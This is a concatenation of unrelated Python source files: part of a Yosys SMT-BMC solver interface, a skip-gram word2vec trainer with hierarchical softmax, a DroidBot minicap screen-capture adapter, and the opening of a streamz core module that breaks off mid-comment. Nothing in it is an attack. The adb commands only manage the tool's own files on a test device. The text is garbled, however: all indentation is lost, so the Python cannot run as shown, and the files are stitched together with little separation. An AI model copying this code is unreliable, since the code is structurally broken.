i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.replace("\\", "/").split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
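# --- Illustrative sketch (not in the original file): the S-expression and
# bitvector helpers on SmtIo are pure functions of their input, so they can
# be exercised without launching a solver (this assumes the local smtlog
# module used above is importable).
smt = SmtIo()
ast = smt.parse("(model (define-fun x () Bool true))")
print(ast)                   # ['model', ['define-fun', 'x', [], 'Bool', 'true']]
print(smt.unparse(ast))      # (model (define-fun x () Bool true))
print(smt.bv2bin("#xA5"))    # 10100101
print(smt.bv2hex("#b1010"))  # a
print(smt.bv2int(["_", "bv10", "8"]))  # 10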
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
        if re.match(r"[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$version Generated by Yosys-SMTBMC $end", file=self.f)
print("$timescale 1ns $end", file=self.f)
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
skip-gramHSNP.py
import re  # used by normalizeString below
import numpy as np
import multiprocessing
from multiprocessing import Pool, Array, Process, Value, Manager
import random
import os
import unicodedata
import time
from io import open
num_threads = multiprocessing.cpu_count()
start = time.process_time()
starting_lr = 1e-3
sample = 1e-3
word_count_actual = 0
lr = 0.025
print(num_threads)
MAX_STRING = 100
MAX_SENTENCE_LENGTH = 1000
MAX_CODE_LENGTH = 40
# Turn a Unicode string to plain ASCII
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
)
# Lowercase, trim, and remove non-letter characters
def normalizeString(s):
s = unicodeToAscii(s.lower().strip())
s = re.sub(r"([.!?])", r" \1", s)
    s = re.sub(r"[^a-zA-Z.!?]+", r" ", s)  # drop everything except letters and sentence punctuation
s = re.sub(r"\s+", r" ", s).strip()
return s
class Voc:
def __init__(self):
self.trimmed = False
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
# For Huffman encoding
self.index2code = {}
self.index2point = {}
self.index2codelen = {}
self.num_words = 0
        self.total_words = 0
def _init_dict(self, input_file, min_count):
"""
sentences = []
for line in self.input_file:
sentence = []
line = line.strip().split(' ')
for word in line:
word = normalizeString(word)
self.addWord(word)
                sentence.append(word)
sentences.append(sentence)
"""
# Customize for text8 data
sentences = []
line = input_file.read()
line = line.strip().split(' ')
for word in line:
word = normalizeString(word)
self.addWord(word)
sentences.append(word)
self.trim(min_count)
for k, c in self.word2count.items():
self.total_words += c
return sentences
def addSentence(self, sentence):
for word in sentence.split(' '):
self.addWord(word)
def addWord(self, word):
if word not in self.word2index:
self.word2index[word] = self.num_words
self.word2count[word] = 1
self.index2word[self.num_words] = word
self.index2count[self.num_words] = 1
self.num_words += 1
else:
self.word2count[word] += 1
self.index2count[self.word2index[word]] += 1
# Remove words below a certain count threshold
def trim(self, min_count):
if self.trimmed:
return
self.trimmed = True
keep_words = []
for k, v in self.word2count.items():
if v >= min_count:
for _ in range(v):
keep_words.append(k)
print('keep_words {} / {} = {:.4f}'.format(
len(keep_words), len(self.word2index), len(keep_words) / len(self.word2index)
))
# Reinitialize dictionaries
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
self.num_words = 0
for word in keep_words:
self.addWord(word)
class HuffmanTree:
def __init__(self, vocab):
self.vocab = vocab
self.vocab_size = len(self.vocab.index2count)
self.count = np.ones(self.vocab_size * 2 + 1) * 1e15
for word_id, frequency in self.vocab.index2count.items():
self.count[word_id] = frequency
self.binary = np.zeros(self.vocab_size * 2 + 1)
self.parent = np.zeros(self.vocab_size * 2 + 1)
def build_tree(self):
min1_idx = min2_idx = int()
pos1 = self.vocab_size - 1
pos2 = self.vocab_size
        # The following algorithm constructs the Huffman tree by adding one node at a time
        for i in range(self.vocab_size - 1):  # V leaves need exactly V - 1 internal nodes
            # First, find the two smallest nodes 'min1, min2'
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min1_idx = pos1
pos1 -= 1
else:
min1_idx = pos2
pos2 += 1
else:
min1_idx = pos2
pos2 += 1
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min2_idx = pos1
pos1 -= 1
else:
min2_idx = pos2
pos2 += 1
else:
min2_idx = pos2
pos2 += 1
self.count[self.vocab_size + i] = self.count[min1_idx] + self.count[min2_idx]
self.parent[min1_idx] = self.vocab_size + i
self.parent[min2_idx] = self.vocab_size + i
self.binary[min2_idx] = 1
        # Now assign a binary code to each vocabulary word
        for w_id in range(self.vocab_size):
            path_id = w_id
            code = np.array([])
            point = np.array([])
            while 1:
                # np.insert returns a new array, so the result must be reassigned
                code = np.insert(code, 0, self.binary[path_id])
                point = np.insert(point, 0, path_id)
                path_id = int(self.parent[path_id])
                if path_id == (self.vocab_size * 2 - 2):  # reached the root
                    break
            # internal nodes are re-indexed to rows of the output weight matrix
            point = point - self.vocab_size
            point = np.insert(point, 0, self.vocab_size - 2)
            self.vocab.index2codelen[w_id] = len(code)
            self.vocab.index2point[w_id] = point
            self.vocab.index2code[w_id] = code
del self.count
del self.binary
del self.parent
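# --- Sanity-check sketch (not in the original file): build a tree over a toy
# vocabulary; more frequent words should receive shorter Huffman codes.
_v = Voc()
for _w, _n in [("the", 5), ("cat", 3), ("sat", 2), ("mat", 1)]:
    for _ in range(_n):
        _v.addWord(_w)
_tree = HuffmanTree(_v)
_tree.build_tree()
print(_v.index2code)  # "the" gets the shortest code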
MIN_COUNT = 3
MAX_EXP = 6
EPOCH = 5
WINDOW = 5
debug_mode = True
def sigmoid(x, derivative=False):
sigm = 1. / (1. + np.exp(-x))
if derivative:
return sigm * (1. - sigm)
return sigm
# Make a Skip-gram model
class SkipGram:
def __init__(self, vocab, emb_dim):
self.sentences = []
self.vocab = vocab
self.embed_dim = emb_dim
low = -0.5 / emb_dim
high = 0.5 / emb_dim
self.W = np.random.uniform(low, high, (self.vocab.num_words, emb_dim))
self.W_prime = np.zeros((self.vocab.num_words, emb_dim))
def LoadData(self, tid):
sentence_count = len(self.sentences)
start = sentence_count // num_threads * tid
end = min(sentence_count // num_threads * (tid + 1), sentence_count)
return self.sentences[start:end]
def Save_Embedding(self, file_name):
embedding = self.W
        with open(file_name, 'w') as fout:
            fout.write('%d %d\n' % (len(self.vocab.index2word), self.embed_dim))
            for w_id, w in self.vocab.index2word.items():
                e = embedding[w_id]
                e = ' '.join(map(str, e))
                fout.write('%s %s\n' % (w, e))
    def TrainModelThread(self, tid, lr, word_count_actual, W, W_prime):
        word_count = last_word_count = sentence_position = sentence_length = 0
        local_epochs = EPOCH
        sentences = self.LoadData(tid)
        # View the flat shared Arrays created in TrainModel as 2-D matrices (no copy)
        W = np.frombuffer(W.get_obj()).reshape(self.vocab.num_words, self.embed_dim)
        W_prime = np.frombuffer(W_prime.get_obj(), dtype=np.float32).reshape(self.vocab.num_words, self.embed_dim)
        neu1 = np.zeros(self.embed_dim)
        neu1e = np.zeros(self.embed_dim)
        sen = []
        for epoch in range(local_epochs):
for sentence in sentences:
sentence_position = 0
sentence_length = 0
sen = []
while 1:
if word_count - last_word_count > 10000:
word_count_actual.value = word_count_actual.value + word_count - last_word_count
last_word_count = word_count
if debug_mode:
now = time.process_time()
print("Learning rate: {:f} Progress: {:.2f} Words/thread/sec: {:.2f}k ".format(lr,
word_count_actual.value / (EPOCH * self.vocab.total_words + 1) * 100,
word_count_actual.value / (now - start + 1) / 1e6 * 1000))
lr.value = starting_lr * (1 - word_count_actual.value / (EPOCH * self.vocab.total_words + 1))
if (lr.value < starting_lr * 0.0001):
lr.value = starting_lr * 0.0001
                    if sentence_length == 0:
                        for word in sentence:
                            word_count += 1
                            if word not in self.vocab.word2index:
                                continue  # skip words removed by trim()
                            if sample > 0:
                                ran = (np.sqrt(self.vocab.word2count[word] / (sample * self.vocab.total_words)) + 1) * (sample * self.vocab.total_words) / self.vocab.word2count[word]
                                if ran < np.random.uniform(0, 1, 1).item():
                                    continue
                            sen.append(self.vocab.word2index[word])
                            sentence_length += 1
                        sentence_position = 0
word_idx = sen[sentence_position]
neu1 = np.zeros(self.embed_dim)
neu1e = np.zeros(self.embed_dim)
b = np.random.randint(WINDOW, size=1).item()
for a in range(b, WINDOW*2 + 1 - b, 1):
if a != WINDOW:
last_pos = sentence_position - WINDOW + a
if last_pos < 0: continue
if last_pos >= sentence_length: continue
last_word_idx = sen[last_pos]
l1 = last_word_idx
neu1e = np.zeros(self.embed_dim)
# Hierarchical Softmax
for d in range(self.vocab.index2codelen[word_idx]):
f = 0
                                l2 = int(self.vocab.index2point[word_idx][d])  # d-th node on the Huffman path
# Propagate hidden -> output
f += np.dot(W[l1], W_prime[l2])
if f <= -MAX_EXP:
continue
elif f >= MAX_EXP:
continue
else:
f = sigmoid(f)
# 'g' is the gradient multiplied by the learning rate
gradient = (1 - self.vocab.index2code[word_idx][d] - f) * lr.value
# Propagate errors output -> hidden
neu1e += gradient * W_prime[l2]
# Learn weights hidden -> output
W_prime[l2] += gradient * W[l1]
# Learn weights input -> hidden
W[l1] += neu1e
sentence_position += 1
if sentence_position >= sentence_length:
break
word_count_actual.value = word_count_actual.value + word_count - last_word_count
word_count = 0
last_word_count = 0
sentence_length = 0
def TrainModel(self, input_file_name, output_file_name):
print("Starting training using file ", input_file_name)
        input_file = open(input_file_name, 'r')  # text mode: _init_dict splits on str tokens
# Initializing dictionary
self.sentences = self.vocab._init_dict(input_file, MIN_COUNT)
huffman = HuffmanTree(self.vocab)
huffman.build_tree()
start = time.process_time()
        jobs = []
        word_count_actual = Value('i', 0)
        lr = Value('d', 0.025)
        # Shared memory must be flat; each worker reshapes it back to 2-D
        W = Array('d', self.W.flatten())
        W_prime = Array('f', self.W_prime.flatten())
        for i in range(num_threads):
            # pass the worker index directly instead of a shared counter (avoids a race)
            p = Process(target=self.TrainModelThread, args=[i, lr, word_count_actual, W, W_prime])
            jobs.append(p)
for j in jobs:
j.start()
for j in jobs:
j.join()
        self.Save_Embedding(output_file_name)
input_file_name='/home/changmin/research/MMI/data/text8'
output_file_name='embedding.txt'
ff = open(input_file_name, 'r')
voc = Voc()
voc._init_dict(ff, 3)
print(voc.num_words)
print(voc.word2index)
#skip = SkipGram(voc, 100)
#skip.TrainModel(input_file_name, output_file_name)
minicap.py
import logging
import socket
import subprocess
import time
from datetime import datetime
from .adapter import Adapter
MINICAP_REMOTE_ADDR = "localabstract:minicap"
ROTATION_CHECK_INTERVAL_S = 1 # Check rotation once per second
class MinicapException(Exception):
"""
Exception in minicap connection
"""
pass
class Minicap(Adapter):
"""
a connection with target device through minicap.
"""
def __init__(self, device=None):
"""
initiate a minicap connection
:param device: instance of Device
:return:
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.host = "localhost"
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.port = self.device.get_random_port()
self.remote_minicap_path = "/data/local/tmp/minicap-devel"
self.sock = None
self.connected = False
self.minicap_process = None
self.banner = None
self.width = -1
self.height = -1
self.orientation = -1
self.last_screen = None
self.last_screen_time = None
self.last_views = []
self.last_rotation_check_time = datetime.now()
def set_up(self):
device = self.device
try:
minicap_files = device.adb.shell("ls %s 2>/dev/null" % self.remote_minicap_path).split()
if "minicap.so" in minicap_files and ("minicap" in minicap_files or "minicap-nopie" in minicap_files):
self.logger.debug("minicap was already installed.")
return
        except Exception:
pass
if device is not None:
# install minicap
import pkg_resources
local_minicap_path = pkg_resources.resource_filename("droidbot", "resources/minicap")
try:
device.adb.shell("mkdir %s 2>/dev/null" % self.remote_minicap_path)
except Exception:
pass
abi = device.adb.get_property('ro.product.cpu.abi')
sdk = device.get_sdk_version()
if sdk >= 16:
minicap_bin = "minicap"
else:
minicap_bin = "minicap-nopie"
device.push_file(local_file="%s/libs/%s/%s" % (local_minicap_path, abi, minicap_bin),
remote_dir=self.remote_minicap_path)
device.push_file(local_file="%s/jni/libs/android-%s/%s/minicap.so" % (local_minicap_path, sdk, abi),
remote_dir=self.remote_minicap_path)
self.logger.debug("minicap installed.")
def tear_down(self):
try:
delete_minicap_cmd = "adb -s %s shell rm -r %s" % (self.device.serial, self.remote_minicap_path)
p = subprocess.Popen(delete_minicap_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception:
pass
def connect(self):
device = self.device
display = device.get_display_info(refresh=True)
if 'width' not in display or 'height' not in display or 'orientation' not in display:
self.logger.warning("Cannot get the size of current device.")
return
w = display['width']
h = display['height']
        if w > h:
            w, h = h, w
o = display['orientation'] * 90
self.width = w
self.height = h
self.orientation = o
size_opt = "%dx%d@%dx%d/%d" % (w, h, w, h, o)
grant_minicap_perm_cmd = "adb -s %s shell chmod -R a+x %s" % \
(device.serial, self.remote_minicap_path)
start_minicap_cmd = "adb -s %s shell LD_LIBRARY_PATH=%s %s/minicap -P %s" % \
(device.serial, self.remote_minicap_path, self.remote_minicap_path, size_opt)
self.logger.debug("starting minicap: " + start_minicap_cmd)
p = subprocess.Popen(grant_minicap_perm_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
self.minicap_process = subprocess.Popen(start_minicap_cmd.split(),
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Wait 2 seconds for starting minicap
time.sleep(2)
self.logger.debug("minicap started.")
try:
# forward host port to remote port
forward_cmd = "adb -s %s forward tcp:%d %s" % (device.serial, self.port, MINICAP_REMOTE_ADDR)
subprocess.check_call(forward_cmd.split())
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
import threading
listen_thread = threading.Thread(target=self.listen_messages)
listen_thread.start()
except socket.error as e:
self.connected = False
self.logger.warning(e)
raise MinicapException()
def listen_messages(self):
self.logger.debug("start listening minicap images ...")
CHUNK_SIZE = 4096
readBannerBytes = 0
bannerLength = 2
readFrameBytes = 0
frameBodyLength = 0
frameBody = bytearray()
banner = {
"version": 0,
"length": 0,
"pid": 0,
"realWidth": 0,
"realHeight": 0,
"virtualWidth": 0,
"virtualHeight": 0,
"orientation": 0,
"quirks": 0,
}
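        # Banner layout per the minicap protocol (24 bytes, little-endian):
        #   version(1) length(1) pid(4) realWidth(4) realHeight(4)
        #   virtualWidth(4) virtualHeight(4) orientation(1) quirks(1)
        # Every following frame is a 4-byte little-endian length plus a JPEG
        # body, which is what the state machine below decodes.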
self.connected = True
while self.connected:
chunk = bytearray(self.sock.recv(CHUNK_SIZE))
            if not chunk:
                break  # an empty recv() means the socket was closed
chunk_len = len(chunk)
cursor = 0
while cursor < chunk_len and self.connected:
if readBannerBytes < bannerLength:
if readBannerBytes == 0:
banner['version'] = chunk[cursor]
elif readBannerBytes == 1:
banner['length'] = bannerLength = chunk[cursor]
elif 2 <= readBannerBytes <= 5:
banner['pid'] += (chunk[cursor] << ((readBannerBytes - 2) * 8))
elif 6 <= readBannerBytes <= 9:
banner['realWidth'] += (chunk[cursor] << ((readBannerBytes - 6) * 8))
elif 10 <= readBannerBytes <= 13:
banner['realHeight'] += (chunk[cursor] << ((readBannerBytes - 10) * 8))
elif 14 <= readBannerBytes <= 17:
banner['virtualWidth'] += (chunk[cursor] << ((readBannerBytes - 14) * 8))
elif 18 <= readBannerBytes <= 21:
banner['virtualHeight'] += (chunk[cursor] << ((readBannerBytes - 18) * 8))
elif readBannerBytes == 22:
banner['orientation'] += chunk[cursor] * 90
elif readBannerBytes == 23:
banner['quirks'] = chunk[cursor]
cursor += 1
readBannerBytes += 1
if readBannerBytes == bannerLength:
self.banner = banner
self.logger.debug("minicap initialized: %s" % banner)
elif readFrameBytes < 4:
frameBodyLength += (chunk[cursor] << (readFrameBytes * 8))
cursor += 1
readFrameBytes += 1
else:
if chunk_len - cursor >= frameBodyLength:
frameBody += chunk[cursor: cursor + frameBodyLength]
self.handle_image(frameBody)
cursor += frameBodyLength
frameBodyLength = readFrameBytes = 0
frameBody = bytearray()
else:
frameBody += chunk[cursor:]
frameBodyLength -= chunk_len - cursor
readFrameBytes += chunk_len - cursor
cursor = chunk_len
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def handle_image(self, frameBody):
# Sanity check for JPG header, only here for debugging purposes.
if frameBody[0] != 0xFF or frameBody[1] != 0xD8:
self.logger.warning("Frame body does not start with JPG header")
self.last_screen = frameBody
self.last_screen_time = datetime.now()
self.last_views = None
self.logger.debug("Received an image at %s" % self.last_screen_time)
self.check_rotation()
def check_rotation(self):
current_time = datetime.now()
if (current_time - self.last_rotation_check_time).total_seconds() < ROTATION_CHECK_INTERVAL_S:
return
display = self.device.get_display_info(refresh=True)
if 'orientation' in display:
cur_orientation = display['orientation'] * 90
if cur_orientation != self.orientation:
self.device.handle_rotation()
self.last_rotation_check_time = current_time
def check_connectivity(self):
"""
check if droidbot app is connected
:return: True for connected
"""
if not self.connected:
return False
if self.last_screen_time is None:
return False
return True
def disconnect(self):
"""
disconnect telnet
"""
self.connected = False
if self.sock is not None:
try:
self.sock.close()
except Exception as e:
print(e)
if self.minicap_process is not None:
try:
self.minicap_process.terminate()
except Exception as e:
print(e)
try:
forward_remove_cmd = "adb -s %s forward --remove tcp:%d" % (self.device.serial, self.port)
p = subprocess.Popen(forward_remove_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception as e:
print(e)
def get_views(self):
"""
get UI views using cv module
        opencv-python needs to be installed for this function
:return: a list of views
"""
if not self.last_screen:
self.logger.warning("last_screen is None")
return None
if self.last_views:
return self.last_views
import cv
img = cv.load_image_from_buf(self.last_screen)
view_bounds = cv.find_views(img)
root_view = {
"class": "CVViewRoot",
"bounds": [[0, 0], [self.width, self.height]],
"enabled": True,
"temp_id": 0
}
views = [root_view]
temp_id = 1
for x,y,w,h in view_bounds:
view = {
"class": "CVView",
"bounds": [[x,y], [x+w, y+h]],
"enabled": True,
"temp_id": temp_id,
"signature": cv.calculate_dhash(img[y:y+h, x:x+w]),
"parent": 0
}
views.append(view)
temp_id += 1
root_view["children"] = list(range(1, temp_id))
self.last_views = views
return views
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
minicap = Minicap()
try:
minicap.set_up()
minicap.connect()
except:
minicap.disconnect()
minicap.tear_down()
minicap.device.disconnect()
|
core.py | import asyncio
import builtins
from collections import deque, defaultdict
from datetime import timedelta
import functools
import logging
import six
import sys
import threading
from time import time
from typing import Any, Callable, Hashable, Union
import weakref
import toolz
from tornado import gen
from tornado.locks import Condition
from tornado.ioloop import IOLoop
from tornado.queues import Queue
try:
from distributed.client import default_client as _dask_default_client
except ImportError: # pragma: no cover
_dask_default_client = None
from collections.abc import Iterable
from threading import get_ident as get_thread_identity
from .orderedweakset import OrderedWeakrefSet
no_default = '--no-default--'
_html_update_streams = set()
thread_state = threading.local()
logger = logging.getLogger(__name__)
_io_loops = []
def get_io_loop(asynchronous=None):
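# Resolution order: the caller's current loop for asynchronous use, then
# the loop of a running dask client if one exists, and finally a single
# shared background loop that is created lazily and reused by all streams.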
if asynchronous:
return IOLoop.current()
if _dask_default_client is not None:
try:
client = _dask_default_client()
except ValueError:
# No dask client found; continue
pass
else:
return client.loop
if not _io_loops:
loop = IOLoop()
thread = threading.Thread(target=loop.start)
thread.daemon = True
thread.start()
_io_loops.append(loop)
return _io_loops[-1]
def identity(x):
return x
class RefCounter:
""" A counter to track references to data
This class is used to track how many nodes in the DAG are referencing
a particular element in the pipeline. When the count reaches zero,
then parties interested in knowing if data is done being processed are
notified
Parameters
----------
initial: int, optional
The initial value of the reference counter
cb: callable
The function to call when the reference count reaches zero
loop: tornado.ioloop.IOLoop
The loop on which to create a callback when the reference count
reaches zero
"""
def __init__(self, initial=0, cb=None, loop=None):
self.loop = loop if loop else get_io_loop()
self.count = initial
self.cb = cb
def retain(self, n=1):
"""Retain the reference
Parameters
----------
n: The number of times to retain the reference
"""
self.count += n
def release(self, n=1):
"""Release the reference
If the reference count drops to zero or below, the callback, if
provided, will be added to the provided loop (or the default loop)
Parameters
----------
n: The number of references to release
"""
self.count -= n
if self.count <= 0 and self.cb:
self.loop.add_callback(self.cb)
def __str__(self):
return '<RefCounter count={}>'.format(self.count)
__repr__ = __str__
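# A minimal usage sketch of RefCounter (hypothetical, not part of the public
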